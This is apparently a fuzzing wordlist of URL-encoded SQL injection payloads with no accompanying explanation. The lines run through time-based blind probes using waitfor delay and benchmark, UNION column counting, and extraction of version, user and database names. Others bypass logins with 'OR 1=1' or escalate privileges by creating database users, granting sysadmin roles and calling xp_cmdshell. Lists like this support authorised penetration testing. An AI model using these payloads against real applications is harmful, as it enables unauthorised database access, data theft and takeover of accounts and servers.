"%20and%200=benchmark(3000000,MD5(1))%20%23
"%20and%200=benchmark(3000000,MD5(1))%20--
"%20and%200=benchmark(3000000,MD5(1))%20/*
"%20waitfor%20delay%20'0:0:20'%20--
"%20waitfor%20delay%20'0:0:20'%20/*
")%20and%200=benchmark(3000000,MD5(1))%20%23
")%20and%200=benchmark(3000000,MD5(1))%20--
")%20and%200=benchmark(3000000,MD5(1))%20/*
")%20waitfor%20delay%20'0:0:20'%20--
")%20waitfor%20delay%20'0:0:20'%20/*
"))%20and%200=benchmark(3000000,MD5(1))%20%23
"))%20and%200=benchmark(3000000,MD5(1))%20--
"))%20and%200=benchmark(3000000,MD5(1))%20/*
"))%20waitfor%20delay%20'0:0:20'%20--
"))%20waitfor%20delay%20'0:0:20'%20/*
")))%20and%200=benchmark(3000000,MD5(1))%20%23
")))%20and%200=benchmark(3000000,MD5(1))%20--
")))%20and%200=benchmark(3000000,MD5(1))%20/*
")))%20waitfor%20delay%20'0:0:20'%20--
")))%20waitfor%20delay%20'0:0:20'%20/*
"))))%20and%200=benchmark(3000000,MD5(1))%20%23
"))))%20and%200=benchmark(3000000,MD5(1))%20--
"))))%20and%200=benchmark(3000000,MD5(1))%20/*
"))))%20waitfor%20delay%20'0:0:20'%20--
"))))%20waitfor%20delay%20'0:0:20'%20/*
")))))%20waitfor%20delay%20'0:0:20'%20--
")))))%20waitfor%20delay%20'0:0:20'%20/*
"))))))%20waitfor%20delay%20'0:0:20'%20--
"))))))%20waitfor%20delay%20'0:0:20'%20/*
"),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))%23
"),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))--
"),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))/*
"),NULL)%20waitfor%20delay%20'0:0:20'%20--
"),NULL)%20waitfor%20delay%20'0:0:20'%20/*
"),NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
"),NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
"),NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
"),NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
"),NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
"),NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
"),NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
"),NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
"),NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
"),NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
"),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
"),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
"),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
"),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
"+if(benchmark(3000000,MD5(1)),NULL,NULL))%20%23
"+if(benchmark(3000000,MD5(1)),NULL,NULL))%20--
"+if(benchmark(3000000,MD5(1)),NULL,NULL))%20/*
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL)%20%23
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL)%20--
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL)%20/*
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL)%20%23
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL)%20--
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL)%20/*
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL)%20%23
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL)%20--
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL)%20/*
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL)%20%23
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL)%20--
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL)%20/*
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL)%20%23
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL)%20--
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL)%20/*
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL)%20%23
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL)%20--
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL)%20/*
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20%23
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20--
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20/*
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20%23
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20--
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20/*
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20%23
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20--
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20/*
",(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))%23
",(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))--
",(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))/*
",NULL)%20waitfor%20delay%20'0:0:20'%20--
",NULL)%20waitfor%20delay%20'0:0:20'%20/*
",NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
",NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
",NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
",NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
",NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
",NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
",NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
",NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
",NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
",NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
",NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
",NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
",NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
",NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
%20'sa'%20waitfor%20delay%20'0:0:2'%20-->';%20if%20not(select%20system_user)%20<>%20'sa'%20waitfor%20delay%20'0:0:2'%20--
%200%20waitfor%20delay%20'0:0:2'%20-->';%20if%20is_srvrolemember('sysadmin')%20>%200%20waitfor%20delay%20'0:0:2'%20--
%200)%20waitfor%20delay%20'0:0:2'%20-->';%20if%20not((select%20serverproperty('isintegratedsecurityonly'))%20<>%200)%20waitfor%20delay%20'0:0:2'%20--
%200)%20waitfor%20delay%20'0:0:2'%20-->';%20if%20not(substring((select%20@@version),25,1)%20<>%200)%20waitfor%20delay%20'0:0:2'%20--
%201)%20waitfor%20delay%20'0:0:2'%20-->';%20if%20not((select%20serverproperty('isintegratedsecurityonly'))%20<>%201)%20waitfor%20delay%20'0:0:2'%20--
%201)%20waitfor%20delay%20'0:0:2'%20-->';%20if%20not(substring((select%20@@version),24,1)%20<>%201)%20waitfor%20delay%20'0:0:2'%20--
%20116>1%20and%20ascii(lower(substring((select%20top%201%20name%20from%20sysobjects%20where%20xtype='u'),%201,%201)))%20>%20116
%205)%20waitfor%20delay%20'0:0:2'%20-->';%20if%20not(substring((select%20@@version),25,1)%20<>%205)%20waitfor%20delay%20'0:0:2'%20--
%208)%20waitfor%20delay%20'0:0:2'%20-->';%20if%20not(substring((select%20@@version),25,1)%20<>%208)%20waitfor%20delay%20'0:0:2'%20--
'%20;%20drop%20table%20temp%20--
'%20OR%201=1-->'%20OR%201=1--
'%20UNION%20SELECT%20ALL%201
'%20UNION%20SELECT%20ALL%201,2
'%20UNION%20SELECT%20ALL%201,2,3
'%20UNION%20SELECT%20ALL%201,2,3,4
'%20UNION%20SELECT%20ALL%201,2,3,4,5
'%20UNION%20SELECT%20ALL%201,2,3,4,5,6
'%20UNION%20SELECT%20ALL%201,2,3,4,5,6,7
'%20UNION%20SELECT%20ALL%201,2,3,4,5,6,7,8
'%20UNION%20SELECT%20ALL%201,2,3,4,5,6,7,8,9
'%20UNION%20SELECT%20ALL%201,2,3,4,5,6,7,8,9,10
'%20UNION%20SELECT%20ALL%201,2,3,4,5,6,7,8,9,10,11
'%20UNION%20SELECT%20ALL%201,2,3,4,5,6,7,8,9,10,11,12
'%20UNION%20SELECT%20ALL%201,2,3,4,5,6,7,8,9,10,11,12,13
'%20UNION%20SELECT%20ALL%201,2,3,4,5,6,7,8,9,10,11,12,13,14
'%20UNION%20SELECT%20ALL%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15
'%20UNION%20SELECT%20ALL%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16
'%20UNION%20SELECT%20ALL%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17
'%20UNION%20SELECT%20ALL%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18
'%20UNION%20SELECT%20ALL%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19
'%20UNION%20SELECT%20ALL%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20
'%20UNION%20SELECT%20ALL%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20--
'%20UNION%20SELECT%20ALL%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19--
'%20UNION%20SELECT%20ALL%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18--
'%20UNION%20SELECT%20ALL%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17--
'%20UNION%20SELECT%20ALL%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16--
'%20UNION%20SELECT%20ALL%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15--
'%20UNION%20SELECT%20ALL%201,2,3,4,5,6,7,8,9,10,11,12,13,14--
'%20UNION%20SELECT%20ALL%201,2,3,4,5,6,7,8,9,10,11,12,13--
'%20UNION%20SELECT%20ALL%201,2,3,4,5,6,7,8,9,10,11,12--
'%20UNION%20SELECT%20ALL%201,2,3,4,5,6,7,8,9,10,11--
'%20UNION%20SELECT%20ALL%201,2,3,4,5,6,7,8,9,10--
'%20UNION%20SELECT%20ALL%201,2,3,4,5,6,7,8,9--
'%20UNION%20SELECT%20ALL%201,2,3,4,5,6,7,8--
'%20UNION%20SELECT%20ALL%201,2,3,4,5,6,7--
'%20UNION%20SELECT%20ALL%201,2,3,4,5,6--
'%20UNION%20SELECT%20ALL%201,2,3,4,5--
'%20UNION%20SELECT%20ALL%201,2,3,4--
'%20UNION%20SELECT%20ALL%201,2,3--
'%20UNION%20SELECT%20ALL%201,2--
'%20UNION%20SELECT%20ALL%201--
'%20and%200=benchmark(3000000,MD5(1))%20%23
'%20and%200=benchmark(3000000,MD5(1))%20--
'%20and%200=benchmark(3000000,MD5(1))%20/*
'%20exec%20sp_addsrvrolemember%20'name'%20,%20'sysadmin'%20--
'%20grant%20connect%20to%20name;%20grant%20resource%20to%20name;%20--
'%20insert%20into%20mysql.user%20(user,%20host,%20password)%20values%20('name',%20'localhost',%20password('pass123'))%20--
'%20insert%20into%20users(login,%20password,%20level)%20values(%20char(0x70)%20+%20char(0x65)%20+%20char(0x74)%20+%20char(0x65)%20+%20char(0x72)%20+%20char(0x70)%20+%20char(0x65)%20+%20char(0x74)%20+%20char(0x65)%20+%20char(0x72),char(0x64)
'%20or%201=1%20--
'%20or%20username%20is%20not%20NULL%20or%20username%20=%20'
'%20union%20(select%20@@version)%20--
'%20union%20(select%20NULL,%20(select%20@@version))%20--
'%20union%20(select%20NULL,%20NULL,%20(select%20@@version))%20--
'%20union%20(select%20NULL,%20NULL,%20NULL,%20%20(select%20@@version))%20--
'%20union%20(select%20NULL,%20NULL,%20NULL,%20NULL,%20%20(select%20@@version))%20--
'%20union%20(select%20NULL,%20NULL,%20NULL,%20NULL,%20%20NULL,%20(select%20@@version))%20--
'%20waitfor%20delay%20'0:0:20'%20--
'%20waitfor%20delay%20'0:0:20'%20/*
')%20and%200=benchmark(3000000,MD5(1))%20%23
')%20and%200=benchmark(3000000,MD5(1))%20--
')%20and%200=benchmark(3000000,MD5(1))%20/*
')%20or%201=1%20][('%20or
')%20waitfor%20delay%20'0:0:20'%20--
')%20waitfor%20delay%20'0:0:20'%20/*
'))%20and%200=benchmark(3000000,MD5(1))%20%23
'))%20and%200=benchmark(3000000,MD5(1))%20--
'))%20and%200=benchmark(3000000,MD5(1))%20/*
'))%20waitfor%20delay%20'0:0:20'%20--
'))%20waitfor%20delay%20'0:0:20'%20/*
')))%20and%200=benchmark(3000000,MD5(1))%20%23
')))%20and%200=benchmark(3000000,MD5(1))%20--
')))%20and%200=benchmark(3000000,MD5(1))%20/*
')))%20waitfor%20delay%20'0:0:20'%20--
')))%20waitfor%20delay%20'0:0:20'%20/*
'))))%20and%200=benchmark(3000000,MD5(1))%20%23
'))))%20and%200=benchmark(3000000,MD5(1))%20--
'))))%20and%200=benchmark(3000000,MD5(1))%20/*
'))))%20waitfor%20delay%20'0:0:20'%20--
'))))%20waitfor%20delay%20'0:0:20'%20/*
')))))%20waitfor%20delay%20'0:0:20'%20--
')))))%20waitfor%20delay%20'0:0:20'%20/*
'))))))%20waitfor%20delay%20'0:0:20'%20--
'))))))%20waitfor%20delay%20'0:0:20'%20/*
'),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))%23
'),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))--
'),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))/*
'),NULL)%20waifor%20delay%20'0:0:20'%20/*
'),NULL)%20waitfor%20delay%20'0:0:20'%20--
'),NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
'),NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
'),NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
'),NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
'),NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
'),NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
'),NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
'),NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
'),NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
'),NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
'),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
'),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
'),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
'),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
'+if(benchmark(3000000,MD5(1)),NULL,NULL))%20%23
'+if(benchmark(3000000,MD5(1)),NULL,NULL))%20--
'+if(benchmark(3000000,MD5(1)),NULL,NULL))%20/*
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL)%20%23
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL)%20--
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL)%20/*
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL)%20%23
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL)%20--
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL)%20/*
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL)%20%23
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL)%20--
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL)%20/*
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL)%20%23
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL)%20--
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL)%20/*
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL)%20%23
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL)%20--
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL)%20/*
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL)%20%23
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL)%20--
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL)%20/*
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20%23
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20--
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20/*
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20%23
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20--
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20/*
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20%23
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20--
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20/*
',%20''%201-->'%20union%20select%201,%20'',%20''%201--
',(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))%23
',(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))--
',(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))/*
',NULL)%20waifor%20delay%20'0:0:20'%20/*
',NULL)%20waitfor%20delay%20'0:0:20'%20--
',NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
',NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
',NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
',NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
',NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
',NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
',NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
',NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
',NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
',NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
',NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
',NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
'-->'--
'===%20stored(blog)==='
'====%20GET%20Search%20==='
'>exec%20master..xp_cmdshell%20'ping+'
'OR%20''%20=%20' Allows%20authentication%20without%20a%20valid%20username.
'OR%201=1--
'create%20user%20name%20identified%20by%20'pass123'%20--
'create%20user%20name%20identified%20by%20pass123%20temporary%20tablespace%20temp%20default%20tablespace%20users;
'exec%20sp_addlogin%20'name'%20,%20'password'%20--
)%20and%200=benchmark(3000000,MD5(1))%20%23
)%20and%200=benchmark(3000000,MD5(1))%20--
)%20and%200=benchmark(3000000,MD5(1))%20/*
)%20waitfor%20delay%20'0:0:20'%20--
)%20waitfor%20delay%20'0:0:20'%20/*
))%20and%200=benchmark(3000000,MD5(1))%20%23
))%20and%200=benchmark(3000000,MD5(1))%20--
))%20and%200=benchmark(3000000,MD5(1))%20/*
))%20waitfor%20delay%20'0:0:20'%20--
))%20waitfor%20delay%20'0:0:20'%20/*
)))%20and%200=benchmark(3000000,MD5(1))%20%23
)))%20and%200=benchmark(3000000,MD5(1))%20--
)))%20and%200=benchmark(3000000,MD5(1))%20/*
)))%20waitfor%20delay%20'0:0:20'%20--
)))%20waitfor%20delay%20'0:0:20'%20/*
))))%20and%200=benchmark(3000000,MD5(1))%20%23
))))%20and%200=benchmark(3000000,MD5(1))%20--
))))%20and%200=benchmark(3000000,MD5(1))%20/*
))))%20waitfor%20delay%20'0:0:20'%20--
))))%20waitfor%20delay%20'0:0:20'%20/*
)))))%20waitfor%20delay%20'0:0:20'%20--
))))))%20waitfor%20delay%20'0:0:20'%20--
),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))%23
),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))--
),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))/*
),NULL)%20waitfor%20delay%20'0:0:20'%20--
),NULL)%20waitfor%20delay%20'0:0:20'%20/*
),NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
),NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
),NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
),NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
),NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
),NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
),NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
),NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
),NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
),NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
+if(benchmark(3000000,MD5(1)),NULL,NULL))%20%23
+if(benchmark(3000000,MD5(1)),NULL,NULL))%20--
+if(benchmark(3000000,MD5(1)),NULL,NULL))%20/*
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL)%20%23
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL)%20--
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL)%20/*
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL)%20%23
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL)%20--
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL)%20/*
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL)%20%23
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL)%20--
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL)%20/*
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL)%20%23
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL)%20--
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL)%20/*
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL)%20%23
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL)%20--
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL)%20/*
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL)%20%23
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL)%20--
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL)%20/*
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20%23
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20--
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20/*
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20%23
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20--
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20/*
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20%23
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20--
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20/*
,(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))%23
,(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))--
,(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))/*
,NULL)%20waitfor%20delay%20'0:0:20'%20--
,NULL)%20waitfor%20delay%20'0:0:20'%20/*
,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
0'%20UNION%20SELECT%20ALL%201,2,3,4,5,6,7,8,9,@@version
0'%20UNION%20SELECT%20ALL%201,2,3,4,5,6,7,8,9,@@version--
0'%20UNION%20SELECT%20ALL%201,2,3,4,5,6,7,8,9,database()
0'%20UNION%20SELECT%20ALL%201,2,3,4,5,6,7,8,9,database()--
0'%20UNION%20SELECT%20ALL%201,2,3,4,5,6,7,8,9,user()
0'%20UNION%20SELECT%20ALL%201,2,3,4,5,6,7,8,9,user()--
